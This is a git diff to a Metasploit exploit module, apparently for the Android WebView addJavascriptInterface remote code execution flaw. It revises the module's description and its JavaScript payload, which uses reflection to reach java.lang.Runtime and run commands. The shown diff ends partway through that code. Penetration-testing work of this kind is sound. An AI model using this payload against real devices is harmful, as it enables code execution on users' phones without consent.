diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 315379790a..dd11132c36 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote :vuln_test => %Q| for (i in top) { try { - top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); + top[i].getClass().forName('java.lang.Runtime'); is_vuln = true; break; } catch(e) {} } @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Android < 4.2 Browser/WebView addJavascriptInterface Code Execution', + 'Name' => 'Android < 4.2 Browser & WebView addJavascriptInterface Code Execution', 'Description' => %q{ This module exploits a privilege escalation issue that arises when untrusted Javascript code is executed by an Android WebView component that has one or more @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs - 4.1.2 release of Android is known to work. + 4.1.2 release of Android is known to be vulnerable. A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here. @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote %Q| function exec(obj) { // ensure that the object contains a native interface - try { obj.getClass().getName(); } catch(e) { return; } + try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);